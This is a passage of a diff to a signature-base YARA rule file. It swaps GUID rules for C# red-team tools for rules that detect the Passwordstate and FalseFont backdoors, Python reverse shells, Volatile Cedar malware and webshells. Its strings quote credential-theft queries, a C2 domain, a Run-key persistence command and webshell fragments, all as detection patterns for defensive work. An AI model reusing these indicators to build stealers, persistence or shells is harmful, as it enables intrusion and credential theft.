-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x457f and filesize < 2000KB and filesize > 30KB and 2 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharp_Wmiexec : FILE
+rule SIGNATURE_BASE_MAL_Passwordstate_Moserware_Backdoor_Apr21_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ae08a5a2-06d5-55fe-803a-7f4696220904"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/checkymander/Sharp-WMIExec"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3599-L3612"
+		description = "Detects backdoor used in Passwordstate incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "061de3ae-c404-5e4a-a16b-b3b208b1ae7f"
+		date = "2021-04-25"
+		modified = "2023-12-05"
+		reference = "https://thehackernews.com/2021/04/passwordstate-password-manager-update.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_passwordstate_backdoor.yar#L1-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "df683be102decfc65209195d0d2e640985dd7e7cf040fb074fb10c8749e98614"
+		logic_hash = "46bf5b7f4f75997535742021d1d5c2129daae0b3836c08383058e5e5b8e27d93"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c2169ab4a39220d21709964d57e2eafe4b68c115061cbb64507cfbbddbe635c6"
+		hash2 = "f23f9c2aaf94147b2c5d4b39b56514cd67102d3293bdef85101e2c05ee1c3bf9"
 
 	strings:
-		$typelibguid0lo = "0a63b0a1-7d1a-4b84-81c3-bbbfe9913029" ascii wide
+		$x1 = "https://passwordstate-18ed2.kxcdn.com" wide
+		$s1 = " ProxyUserName, ProxyPassword FROM [SystemSettings]" wide fullword
+		$s2 = "PasswordstateService.Passwordstate.Crypto" wide
+		$s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari" wide fullword
+		$op1 = { 00 4c 00 4e 00 43 00 4c 00 49 00 31 00 31 00 3b 00 00 17 }
+		$op2 = { 4c 00 49 00 31 00 31 00 3b 00 00 17 50 00 72 00 }
+		$op3 = { 61 00 74 00 65 00 2d 00 31 00 38 00 65 00 64 00 32 00 2e 00 6b 00 78 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Keethief : FILE
+rule SIGNATURE_BASE_APT_MAL_Falsefont_Backdoor_Jan24 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "71fef0e9-223a-5834-9d1c-f3fb8b66a809"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/GhostPack/KeeThief"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3614-L3632"
+		description = "Detects FalseFont backdoor, related to Peach Sandstorm APT"
+		author = "X__Junior, Jonathan Peters"
+		id = "b6a3efff-2abf-5ac1-9a2b-c7b30b51f92c"
+		date = "2024-01-11"
+		modified = "2024-04-24"
+		reference = "https://twitter.com/MsftSecIntel/status/1737895710169628824"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_peach_sandstorm.yar#L1-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f91aeb1862b803ae44c398a71e6c6ed0017d28206deffa39e4e0bca8faae6701"
-		score = 75
+		hash = "364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614"
+		logic_hash = "9a1b3779b63dd7fa8ddc84067dec09542518e9acebbf5d3b45cb75ec4add1158"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid1lo = "39aa6f93-a1c9-497f-bad2-cc42a61d5710" ascii wide
-		$typelibguid3lo = "3fca8012-3bad-41e4-91f4-534aa9a44f96" ascii wide
-		$typelibguid4lo = "ea92f1e6-3f34-48f8-8b0a-f2bbc19220ef" ascii wide
-		$typelibguid5lo = "c23b51c4-2475-4fc6-9b3a-27d0a2b99b0f" ascii wide
-		$typelibguid7lo = "80ba63a4-7d41-40e9-a722-6dd58b28bf7e" ascii wide
+		$x1 = "Agent.Core.WPF.App" ascii
+		$x2 = "3EzuNZ0RN3h3oV7rzILktSHSaHk+5rtcWOr0mlA1CUA=" wide
+		$x3 = "viOIZ9cX59qDDjMHYsz1Yw==" wide
+		$sa1 = "StopSendScreen" wide
+		$sa2 = "Decryption failed :(" wide
+		$sb1 = "{0}     {1}     {2}     {3}" wide
+		$sb2 = "\\BraveSoftware\\Brave-Browser\\User Data\\" wide
+		$sb3 = "select * from logins" wide
+		$sb4 = "Loginvault.db" wide
+		$sb5 = "password_value" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $sa* ) or all of ( $sb* ) or ( 1 of ( $sa* ) and 4 of ( $sb* ) ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Fakelogonscreen : FILE
+rule SIGNATURE_BASE_Gen_Python_Reverse_Shell : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cc20290c-3f34-5e81-9337-c582f1ee7ade"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/bitsadmin/fakelogonscreen"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3634-L3647"
+		description = "Python Base64 encoded reverse shell"
+		author = "John Lambert @JohnLaTwC"
+		id = "dda831ae-d0ca-5d5a-bdb3-e7c146a770b4"
+		date = "2018-02-24"
+		modified = "2023-12-05"
+		reference = "https://www.virustotal.com/en/file/9ec5102bcbabc45f2aa7775464f33019cfbe9d766b1332ee675957c923a17efd/analysis/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_python_reverse_shell.yara#L1-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "93353997e52fda3cebb03c2c63afc16ea477d3d5d4a7cf8dee26940ccffecd7a"
+		logic_hash = "12b1424265cd0ea62b8dd5c08933f1285a156d906df6c31ca9a94fbc303f248e"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9ec5102bcbabc45f2aa7775464f33019cfbe9d766b1332ee675957c923a17efd"
+		hash2 = "bfb5c622a3352bb71b86df81c45ccefaa68b9f7cc0a3577e8013aad951308f12"
 
 	strings:
-		$typelibguid0lo = "d35a55bd-3189-498b-b72f-dc798172e505" ascii wide
+		$h1 = "import base64" fullword ascii
+		$s1 = "b64decode" fullword ascii
+		$s2 = "lambda" fullword ascii
+		$s3 = "version_info" fullword ascii
+		$enc_x0 = /(AG8AYwBrAGUAdAAuAFMATwBDAEsAXwBTAFQAUgBFAEEATQ|b2NrZXQuU09DS19TVFJFQU|c29ja2V0LlNPQ0tfU1RSRUFN|cwBvAGMAawBlAHQALgBTAE8AQwBLAF8AUwBUAFIARQBBAE0A|MAbwBjAGsAZQB0AC4AUwBPAEMASwBfAFMAVABSAEUAQQBNA|NvY2tldC5TT0NLX1NUUkVBT)/ ascii
+		$enc_x1 = /(4AYwBvAG4AbgBlAGMAdAAoACgA|5jb25uZWN0KC|AGMAbwBuAG4AZQBjAHQAKAAoA|LgBjAG8AbgBuAGUAYwB0ACgAKA|LmNvbm5lY3QoK|Y29ubmVjdCgo)/
+		$enc_x2 = /(AGkAbQBlAC4AcwBsAGUAZQBwA|aW1lLnNsZWVw|dABpAG0AZQAuAHMAbABlAGUAcA|dGltZS5zbGVlc|QAaQBtAGUALgBzAGwAZQBlAHAA|RpbWUuc2xlZX)/
+		$enc_x3 = /(4AcgBlAGMAdg|5yZWN2|AHIAZQBjAHYA|cmVjd|LgByAGUAYwB2A|LnJlY3)/
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32be( 0 ) == 0x696d706f and $h1 at 0 and filesize < 40KB and all of ( $s* ) and all of ( $enc_x* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Poshsecframework : FILE
+rule SIGNATURE_BASE_Explosive_EXE : APT FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a91620f3-3f21-525a-bc87-94d21cd126be"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/PoshSec/PoshSecFramework"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3649-L3663"
+		description = "Explosion/Explosive Malware - Volatile Cedar APT"
+		author = "Check Point Software Technologies Inc."
+		id = "3a9fb6b2-2f19-5d70-81ed-a08c3b8b2d80"
+		date = "2016-02-15"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volatile_cedar.yar#L1-L12"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6af81da2f23a0ad87d918e4ecb5869e8113b03e175c114e553856c4eabfacb71"
+		logic_hash = "77eb74586f5ef2878c0d283b925e6e066f704d00525303990cf5ea7988a6637d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "APT, FILE"
 
 	strings:
-		$typelibguid0lo = "b1ac6aa0-2f1a-4696-bf4b-0e41cf2f4b6b" ascii wide
-		$typelibguid1lo = "78bfcfc2-ef1c-4514-bce6-934b251666d2" ascii wide
+		$DLD_S = "DLD-S:"
+		$DLD_E = "DLD-E:"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them and uint16( 0 ) == 0x5A4D
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpattack : FILE
+rule SIGNATURE_BASE_Explosion_Sample_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1eb911ab-3fb9-54b7-8afb-66328f30d563"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/jaredhaight/SharpAttack"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3665-L3678"
+		description = "Explosion/Explosive Malware - Volatile Cedar APT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dcf28185-75a8-5c9f-9f60-edb8dc187e16"
+		date = "2015-04-03"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/5vYaNb"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volatile_cedar.yar#L14-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eb2f706a8f91c0702472663d5c5672b0e0a9afa775668706377899b36bdb684c"
-		score = 75
+		hash = "c97693ecb36247bdb44ab3f12dfeae8be4d299bb"
+		logic_hash = "f559880c182cf8061d640f60f18fe607d88a1f22216d93ff1d0ece720bcc94a7"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "5f0ceca3-5997-406c-adf5-6c7fbb6cba17" ascii wide
+		$s5 = "REG ADD \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
+		$s9 = "WinAutologon From Winlogon Reg" fullword ascii
+		$s10 = "82BD0E67-9FEA-4748-8672-D5EFE5B779B0" fullword ascii
+		$s11 = "IE:Password-Protected sites" fullword ascii
+		$s12 = "\\his.sys" ascii
+		$s13 = "HTTP Password" fullword ascii
+		$s14 = "\\data.sys" ascii
+		$s15 = "EL$_RasDefaultCredentials#0" fullword wide
+		$s17 = "Office Outlook HTTP" fullword ascii
+		$s20 = "Hist :<b> %ws</b>  :%s </br></br>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them and uint16( 0 ) == 0x5A4D
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Altman : FILE
+rule SIGNATURE_BASE_Explosion_Sample_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "21acc8af-9497-5842-90a9-7a9300585d5d"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/keepwn/Altman"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3680-L3710"
+		description = "Explosion/Explosive Malware - Volatile Cedar APT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8be7ed50-0bfc-5302-b4fa-8817bf1750d7"
+		date = "2015-04-03"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/5vYaNb"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volatile_cedar.yar#L40-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4d7046ac7a0deebb33a33995f4c2b9c6b65d4821262d55aecd8e00379ba93b00"
-		score = 75
+		hash = "62fe6e9e395f70dd632c70d5d154a16ff38dcd29"
+		logic_hash = "db7ead96e0a9b4cf5c5cc885eac421cc11988f60d03f94de5fe828899d115bf0"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "64cdcd2b-7356-4079-af78-e22210e66154" ascii wide
-		$typelibguid1lo = "f1dee29d-ca98-46ea-9d13-93ae1fda96e1" ascii wide
-		$typelibguid2lo = "33568320-56e8-4abb-83f8-548e8d6adac2" ascii wide
-		$typelibguid3lo = "470ec930-70a3-4d71-b4ff-860fcb900e85" ascii wide
-		$typelibguid4lo = "9514574d-6819-44f2-affa-6158ac1143b3" ascii wide
-		$typelibguid5lo = "0f3a9c4f-0b11-4373-a0a6-3a6de814e891" ascii wide
-		$typelibguid6lo = "9624b72e-9702-4d78-995b-164254328151" ascii wide
-		$typelibguid7lo = "faae59a8-55fc-48b1-a9b5-b1759c9c1010" ascii wide
-		$typelibguid8lo = "37af4988-f6f2-4f0c-aa2b-5b24f7ed3bf3" ascii wide
-		$typelibguid9lo = "c82aa2fe-3332-441f-965e-6b653e088abf" ascii wide
-		$typelibguid10lo = "6e531f6c-2c89-447f-8464-aaa96dbcdfff" ascii wide
-		$typelibguid11lo = "231987a1-ea32-4087-8963-2322338f16f6" ascii wide
-		$typelibguid12lo = "7da0d93a-a0ae-41a5-9389-42eff85bb064" ascii wide
-		$typelibguid13lo = "a729f9cc-edc2-4785-9a7d-7b81bb12484c" ascii wide
-		$typelibguid14lo = "55a1fd43-d23e-4d72-aadb-bbd1340a6913" ascii wide
-		$typelibguid15lo = "d43f240d-e7f5-43c5-9b51-d156dc7ea221" ascii wide
-		$typelibguid16lo = "c2e6c1a0-93b1-4bbc-98e6-8e2b3145db8e" ascii wide
-		$typelibguid17lo = "714ae6f3-0d03-4023-b753-fed6a31d95c7" ascii wide
+		$s0 = "serverhelp.dll" fullword wide
+		$s1 = "Windows Help DLL" fullword wide
+		$s5 = "SetWinHoK" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them and uint16( 0 ) == 0x5A4D
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Browserpass : FILE
+rule SIGNATURE_BASE_Explosion_Generic_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bad36c36-dbed-527c-a2f5-4dceff1abe4b"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/jabiel/BrowserPass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3712-L3725"
+		description = "Generic Rule for Explosion/Explosive Malware - Volatile Cedar APT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dc3721b6-c19e-5449-9962-2a6f844e49b4"
+		date = "2015-04-03"
+		modified = "2023-12-05"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volatile_cedar.yar#L59-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ce5f5eaa71fd7358d99743e56a8518c1a852faa39c4a7d1888e0a218e9e7a8ef"
-		score = 75
+		logic_hash = "8b6e1e6aa838036989040dfbf4f6f3e347a717967deef740b35d1752b5c91da5"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "d0f059ba21f06021579835a55220d1e822d1233f95879ea6f7cb9d301408c821"
+		hash1 = "1952fa94b582e9af9dca596b5e51c585a78b8b1610639e3b878bbfa365e8e908"
+		hash2 = "d8fdcdaad652c19f4f4676cd2f89ae834dbc19e2759a206044b18601875f2726"
+		hash3 = "e2e6ed82703de21eb4c5885730ba3db42f3ddda8b94beb2ee0c3af61bc435747"
+		hash4 = "03641e5632673615f23b2a8325d7355c4499a40f47b6ae094606a73c56e24ad0"
 
 	strings:
-		$typelibguid0lo = "3cb59871-0dce-453b-857a-2d1e515b0b66" ascii wide
+		$s0 = "autorun.exe" fullword
+		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; MSIE 6.0; Windows NT 5.1; .NET CL"
+		$s2 = "%drp.exe" fullword
+		$s3 = "%s_%s%d.exe" fullword
+		$s4 = "open=autorun.exe" fullword
+		$s5 = "http://www.microsoft.com/en-us/default.aspx" fullword
+		$s10 = "error.renamefile" fullword
+		$s12 = "insufficient lookahead" fullword
+		$s13 = "%s %s|" fullword
+		$s16 = ":\\autorun.exe" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		7 of them and uint16( 0 ) == 0x5A4D
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Mythic : FILE
+rule SIGNATURE_BASE_Explosive_UA : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "44237fac-1526-5587-83a1-61d7a54f7da9"
-		date = "2020-12-29"
-		modified = "2025-08-15"
-		reference = "https://github.com/its-a-feature/Mythic"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3727-L3741"
+		description = "Explosive Malware Embedded User Agent - Volatile Cedar APT http://goo.gl/HQRCdw"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d88d5fd6-adf9-5ced-8b79-e47e3ffbde50"
+		date = "2015-04-03"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/HQRCdw"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volatile_cedar.yar#L90-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3d3b942e110bbf181ecbda5d4b3c2f7775e8e9b4860722238fe686c36422d456"
-		score = 75
+		logic_hash = "9ed7fedcf9cda868803c8ace393e08709a747b909178e19cdbb1b116edbb82f9"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "91f7a9da-f045-4239-a1e9-487ffdd65986" ascii wide
-		$typelibguid1lo = "0405205c-c2a0-4f9a-a221-48b5c70df3b6" ascii wide
+		$x1 = "Mozilla/4.0 (compatible; MSIE 7.0; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$x1 and uint16( 0 ) == 0x5A4D
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Nuages : FILE
+rule SIGNATURE_BASE_Webshell_Caterpillar_ASPX
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5ad947e2-bd71-50d4-9bbf-4d018c7ff36a"
-		date = "2020-12-29"
-		modified = "2025-08-15"
-		reference = "https://github.com/p3nt4/Nuages"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3743-L3756"
+		description = "Volatile Cedar Webshell - from file caterpillar.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9af48c64-3768-5765-8245-38df000598a7"
+		date = "2015-04-03"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/emons5"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volatile_cedar.yar#L106-L126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a0d7d89449a6a21bd118ace6a7062ff8d1fa356cf2421cc8c53f2da3719e52fb"
+		logic_hash = "9df2e4a25052136d6e622273f917bd15df410869a8cf3075c773a14ea62a2a55"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "af4c99208fb92dc42bc98c4f96c3536ec8f3fe56"
 
 	strings:
-		$typelibguid0lo = "e9e80ac7-4c13-45bd-9bde-ca89aadf1294" ascii wide
+		$s0 = "Dim objNewRequest As WebRequest = HttpWebRequest.Create(sURL)" fullword
+		$s1 = "command = \"ipconfig /all\"" fullword
+		$s3 = "For Each xfile In mydir.GetFiles()" fullword
+		$s6 = "Dim oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
+		$s10 = "recResult = adoConn.Execute(strQuery)" fullword
+		$s12 = "b = Request.QueryString(\"src\")" fullword
+		$s13 = "rw(\"<a href='\" + link + \"' target='\" + target + \"'>\" + title + \"</a>\")" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsniper : FILE
+rule SIGNATURE_BASE_MAL_RTF_Embedded_OLE_PE : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "14e6a3b8-5e1f-5dd8-9b51-22522ac317e7"
-		date = "2020-12-29"
-		modified = "2025-08-15"
-		reference = "https://github.com/HunnicCyber/SharpSniper"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3758-L3771"
+		description = "Detects a suspicious string often used in PE files in a hex encoded object stream"
+		author = "Florian Roth (Nextron Systems)"
+		id = "20044f08-9574-5baf-b91e-47613e490d62"
+		date = "2018-01-22"
+		modified = "2023-11-25"
+		reference = "https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_strings_in_ole.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "52ae4a89b9cca9bee19e904617ed8c78857a9cee58d691f337fd4a736798aa1e"
-		score = 75
+		logic_hash = "054abb34ae84e02469d726809a6d8aa582ebad65dd8385de7800d3f5db7ee31c"
+		score = 65
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "c8bb840c-04ce-4b60-a734-faf15abf7b18" ascii wide
+		$a1 = "546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465" ascii
+		$a2 = "4b45524e454c33322e646c6c" ascii
+		$a3 = "433a5c66616b65706174685c" ascii
+		$m3 = "4d5a40000100000006000000ffff"
+		$m2 = "4d5a50000200000004000f00ffff"
+		$m1 = "4d5a90000300000004000000ffff"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32be( 0 ) == 0x7B5C7274 and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharphound3 : FILE
+rule SIGNATURE_BASE_SUSP_LNX_Sindoor_ELF_Obfuscation_Aug25 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "58001912-88a1-527d-9d3e-d7c376a1fce4"
-		date = "2020-12-29"
-		modified = "2025-08-15"
-		reference = "https://github.com/BloodHoundAD/SharpHound3"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3773-L3786"
+		description = "Detects ELF obfuscation technique used by Sindoor dropper related to APT 36"
+		author = "Pezier Pierre-Henri"
+		id = "7e743c58-1e05-5387-af73-2df177386482"
+		date = "2025-08-29"
+		modified = "2025-09-02"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt36_operation_sindoor.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9de8457f59133adb09df0c40ece45331ac716fd56d58bd37a40ce7f1d0a53378"
-		score = 75
+		hash = "6879a2b730e391964afe4dbbc29667844ba0c29239be5503b7c86e59e7052443"
+		logic_hash = "c1258c1f6d4b49104bedf3fbef932f1775ede7d32191df2e5479ca9b291add9e"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "a517a8de-5834-411d-abda-2d0e1766539c" ascii wide
+		$s1 = "UPX!"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 10MB and uint16( 0 ) == 0 and uint16( 4 ) > 0 and $s1 in ( 0xc0 .. 0x100 )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Blocketw : FILE
+rule SIGNATURE_BASE_SUSP_LNX_Sindoor_Desktopfile_Aug25 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c2b72fef-6549-5b53-8ccf-232e8d152e96"
-		date = "2020-12-29"
-		modified = "2025-08-15"
-		reference = "https://github.com/Soledge/BlockEtw"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3788-L3801"
+		description = "Detects ELF obfuscation technique used by Sindoor dropper related to APT 36"
+		author = "Pezier Pierre-Henri"
+		id = "69f97bb3-0fb8-5e36-a4f2-0b283744a59e"
+		date = "2025-08-29"
+		modified = "2025-09-02"
+		reference = "Internal Research"
